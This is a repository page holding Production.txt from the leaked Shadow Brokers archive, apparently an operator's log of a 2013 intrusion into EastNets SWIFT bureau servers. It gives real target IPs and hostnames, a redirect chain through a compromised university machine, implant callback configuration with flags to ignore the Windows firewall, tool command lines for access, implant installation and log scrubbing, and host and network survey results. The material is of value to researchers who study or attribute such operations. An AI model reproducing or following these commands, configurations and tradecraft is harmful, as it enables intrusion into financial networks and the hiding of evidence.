sneedmca/shadowbrokers-exploits
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
shadowbrokers-exploits/swift/Production.txt
Donncha O'Cearbhaill 7f640a83d4 Inital commit of Shadowbrokers 'Lost in Translation' release
2017-04-14 11:45:07 +02:00

303 lines
No EOL
10 KiB
Text
Raw Blame History

ISP: LK
City:
Phone:
ISP IP: 79.172.193.160
Source IP:
FINAL target IP:
Ops Machine: LOCALHOST.LOCALDOMAIN
Redirecting Method 1: PITCHIMPAIR
Redirect Host 1: 139.18.13.2
Redirect Target 1: 192.168.208.11
Redirecting Method 2: INCISION
Redirect Host 2: 192.168.208.11
Redirect Target 2: 192.168.200.92
Redirecting Method 3: INCISION
Redirect Host 3: 192.168.208.11
Redirect Target 3: 192.168.200.104
Redirecting Method 4: INCISION
Redirect Host 4: 192.168.208.11
Redirect Target 4: 192.168.219.245
BEGIN UNIX OPNOTES:
Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) :
--> 139.18.13.2 isun02.informatik.uni-leipzig.de pitchimpair unix successful
---> 192.168.208.11 ensbdmgmt2.eastnets.com jeepflea_market windows successful
----> 192.168.200.92 ensbdaldn1.eastnets.com jeepflea_market windows successful
----> 192.168.200.104 ensbdsl3.eastnets.com jeepflea_market windows successful
----> 192.168.219.245 ensbdftp1.eastnets.com jeepflea_market windows successful
Ops Machine: WO
Results:
PROJECT=JEEPFLEA_MARKET
OPUSER=33159
OPSCHEDULE=13083019453124
SCRUBVER=6.007000008
139.18.13.2
-----------
ourtn -Y5wBIN -U /current/up/noserver 139.18.13.2
2013-09-04 15:57:40 UTC -- nothing
2013-09-04 15:58:53 UTC -- on target
6:00pm up 362 day(s), 23:26, 0 users, load average: 4.12, 3.58, 3.50
Wed Sep 4 18:00:10 CEST 2013
- A41F65B7A04AD58DF1D4F91D97C94693BD2A8783 Sat Aug 8 01:23:18 2009 /bin/netstat - clear
2013-09-04 16:01:57 UTC -- ran checks, all clear
2013-09-04 21:26:19 UTC -- bB
LOCALHOST.LOCALDOMAIN: scrubhands v. 6.007000008 20130904-1554
###################
SCRUBHANDS v6.007000008 (suite v6.7.0.08 run in /192.168.254.71) command line:
:
/usr/local/bin/scrubhands -t -S 13083019453124 -I 33159 -P JEEPFLEA_MARKET -n 212.92.23.5 79.172.193.160/192/129
###################
Final lines of bwmonitor.txt:
Wed Sep 04 21:33:16 UTC 2013
eth0 bytes (MB) packets kbps (kBps) kbps-1m kbps-10m kbps-hr
TX 16034996 (15.3) 48981 0.0 (0.0) 1.2 0.5 2.2
RX 20821077 (19.9) 50221 0.0 (0.0) 5.0 1.5 4.2
###################################################
PROJECT: jeepflea_market
DATE: 04:07 PM 09/04/2013
OPUSER: 33159
OPSCHEDULE: 13083019453124
#Op Status: Unsuccessful
#Non-Standard: True
###################################################
Targets:
Results:
z0.0.0.11 = 192.168.208.11
z0.0.0.12 = 192.168.200.92
z0.0.0.13 = 192.168.200.104
z0.0.0.14 = 192.168.219.245
192.168.208.11
--------------
win2k8 r2 sp1 64bit
UR - CB 443, 48071
4:27 PM 9/4/2013 - waiting on egg
4:41 PM 9/4/2013 - nothing yet...
- Configuration:
-
- <?xml version='1.0' encoding='UTF-8' ?>
- <PCConfig>
- <Flags>
- <PCHEAP_CONFIG_FLAG_CALLBACK_NOW/>
- <PCHEAP_CONFIG_FLAG_IGNORE_WIN_FIREWALL/>
- <PCHEAP_CONFIG_FLAG_DONT_CREATE_WINDOW/>
- </Flags>
- <Id>0x0</Id>
- <StartListenHour>0</StartListenHour>
- <StopListenHour>0</StopListenHour>
- <CallbackAddress>139.18.13.2</CallbackAddress>
- <CallbackPorts>
- <CallbackPair>
- <SrcPort>0</SrcPort>
- <DstPort>443</DstPort>
- </CallbackPair>
- <CallbackPair>
- <SrcPort>0</SrcPort>
- <DstPort>48071</DstPort>
- </CallbackPair>
- </CallbackPorts>
- </PCConfig>
4:55 PM 9/4/2013 - waiting 6min
5:03 PM 9/4/2013 - go CB
Process Id : 628
\___ running out of svchost.exe
Uptime: 4 days, 5:40:6
5:07 PM 9/4/2013 - not dorking, redirecting only
- Memory Load : 59%%
- Physical Available: 2482 M
- Physical Total : 6141 M
| Drive | Serial | Type | In use (MB) | Change (MB) |
+-------+-----------+-------+---------------------+-------------+
| C | 7e21-d059 | Fixed | 39246/40975 (95%%) | 0 |
| D | f028-dfdd | Fixed | 24854/81915 (30%%) | 0 |
| E | 745f-d1c6 | Fixed | 54792/349872 (15%%) | 0 |
| F | dc32-e5cd | Fixed | 15981/17089 (93%%) | 0 |
| G | | Cdrom | | |
5:17 PM 9/4/2013 - hour clear, survey done
REPLY from 192.168.200.92 -> 192.168.208.11 -- TTL: 128
REPLY from 192.168.216.110 -> 192.168.208.11 -- TTL: 125
---------------------------------------------------------------------
ENSBJMGMT1 UNIQUE REGISTERED Workstation Service
WORKGROUP GROUP REGISTERED Domain Name
ENSBJMGMT1 UNIQUE REGISTERED File Server Service
WORKGROUP GROUP REGISTERED Browser Service Elections
WORKGROUP UNIQUE REGISTERED Master Browser
??__MSBROWSE__? GROUP REGISTERED Master Browser
Adapter Address: 00.22.64.9b.a1.d0
Adapter Type : Ethernet Adapter
REPLY from 192.168.219.246 -> 192.168.208.11 -- TTL: 128
---------------------------------------------------------------------
ENSBDFTP2 UNIQUE REGISTERED Workstation Service
WORKGROUP GROUP REGISTERED Domain Name
ENSBDFTP2 UNIQUE REGISTERED File Server Service
Adapter Address: 00.24.81.a7.4b.06
Adapter Type : Ethernet Adapter
REPLY from 192.168.219.245 -> 192.168.208.11 -- TTL: 128
---------------------------------------------------------------------
ENSBDFTP1 UNIQUE REGISTERED Workstation Service
WORKGROUP GROUP REGISTERED Domain Name
ENSBDFTP1 UNIQUE REGISTERED File Server Service
Adapter Address: 00.17.a4.77.28.34
Adapter Type : Ethernet Adapter
172.16.104.17 - no bueno
6:47 PM 9/4/2013 - trace to pitch
1 192.168.206.4 1ms
2 80.227.254.194 1ms
3 213.132.54.52 2ms
4 172.16.216.69 2ms
5 10.100.34.97 3ms
6 10.100.34.78 4ms
7 10.100.34.98 7ms
8 10.44.247.93 8ms
9 94.201.0.53 9ms
10 10.44.24.146 177ms
11 212.113.15.65 151ms
12 4.69.166.157 152ms
13 4.69.153.133 152ms
14 4.69.148.190 149ms
15 4.69.140.30 160ms
16 4.69.154.201 147ms
17 212.162.4.6 154ms
18 188.1.144.101 197ms
19 188.1.144.185 168ms
20 188.1.50.10 174ms
21 141.57.252.1 168ms
22 139.18.13.2 169ms
REPLY from 192.168.200.230 -> 192.168.208.11 -- TTL: 128
---------------------------------------------------------------------
ENDPGBTS2 UNIQUE REGISTERED Workstation Service
ENSB GROUP REGISTERED Domain Name
ENDPGBTS2 UNIQUE REGISTERED File Server Service
ENSB GROUP REGISTERED Browser Service Elections
Adapter Address: 00.1e.0b.4b.9d.88
Adapter Type : Ethernet Adapter
9:25 PM 9/4/2013 - hour clear, Q&D
192.168.200.92
--------------
win2k8 R2 Standard
Symantec Endpoint Protection 11
8,0 CB 39781 10001288e
5:25 PM 9/4/2013 - trigger sent
5:29 PM 9/4/2013 - nothing, changing CB ip
5:32 PM 9/4/2013 - got CB
Process Id : 576
\____ running out of services.exe
Uptime: 4 days, 12:54:11
- Memory Load : 58%%
- Physical Available: 5095 M
- Physical Total : 12285 M
| Drive | Serial | Type | In use (MB) | Change (MB) |
+-------+-----------+-------+--------------------+-------------+
| C | 6e60-26bc | Fixed | 33264/40975 (81%%) | 0 |
| D | 48ec-6c42 | Fixed | 5075/40978 (12%%) | 0 |
| E | 600b-29de | Fixed | 13698/61461 (22%%) | 0 |
| F | 3263-9842 | Fixed | 2425/30740 (7%%) | 0 |
| G | 5e25-fad9 | Fixed | 11623/19699 (59%%) | 0 |
| I | 8277-8c5f | Fixed | 23404/92199 (25%%) | 0 |
5:47 PM 9/4/2013 - hour clear, survey done
8:13 PM 9/4/2013 - Upgrading SOTI
kisu_install -type MOAN
kisu_uninstall -type MOAN
8:46 PM 9/4/2013 - hour clear, Q&D
192.168.200.104
---------------
win2k8 r2 sp0 64bit
Symantec Endpoint Protection 11
8,0 CB 49562 0x1000125b8
5:53 PM 9/4/2013 - trigger sent
5:54 PM 9/4/2013 - got CB
Process Id : 592
\____ running out of services.exe
Uptime: 4 days, 14:32:5
- Memory Load : 48%%
- Physical Available: 8518 M
- Physical Total : 16381 M
| Drive | Serial | Type | In use (MB) | Change (MB) |
+-------+-----------+-------+--------------------+-------------+
| C | 6e60-26bc | Fixed | 27273/40975 (66%%) | 0 |
| D | b473-6b76 | Fixed | 5909/40959 (14%%) | 0 |
| E | 44a0-05eb | Fixed | 23869/92159 (25%%) | 0 |
| F | 88b0-6f4d | Fixed | 11994/46073 (26%%) | 0 |
| G | 0c16-8579 | Fixed | 7058/19811 (35%%) | 0 |
| H | a8c8-e176 | Fixed | 1574/46076 (3%%) | 0 |
6:08 PM 9/4/2013 - ran checks, survey done
8:12 PM 9/4/2013 - Upgrading SOTI
kisu_install -type MOAN
kisu_uninstall -type MOAN
8:45 PM 9/4/2013 - hour clear, Q&D
192.168.219.245
---------------
w2k8 64bit
Symantec EP11
8,0 CB 36176
6:28 PM 9/4/2013 - sent
Process Id : 580
\_____ running out of services.exe
Uptime: 4 days, 13:54:14
- Memory Load : 19%%
- Physical Available: 6578 M
- Physical Total : 8189 M
| Drive | Serial | Type | In use (MB) | Change (MB) |
+-------+-----------+-------+--------------------+-------------+
| C | 7e21-d059 | Fixed | 21184/40975 (51%%) | 0 |
| D | 1087-f9ee | Fixed | 4220/20489 (20%%) | 0 |
| E | dc06-2ba9 | Fixed | 26760/56321 (47%%) | 0 |
| F | ec0c-3499 | Fixed | 90/15394 (0%%) | 0 |
| G | 26ff-0963 | Fixed | 1685/6786 (24%%) | 0 |
6:41 PM 9/4/2013 - hour clear, survey done
8:09 PM 9/4/2013 - Upgrading SOTI:
kisu_install -type MOAN
kisu_uninstall -type MOAN
9:15 PM 9/4/2013 - hour clear, Q&D
Reference in a new issue View git blame Copy permalink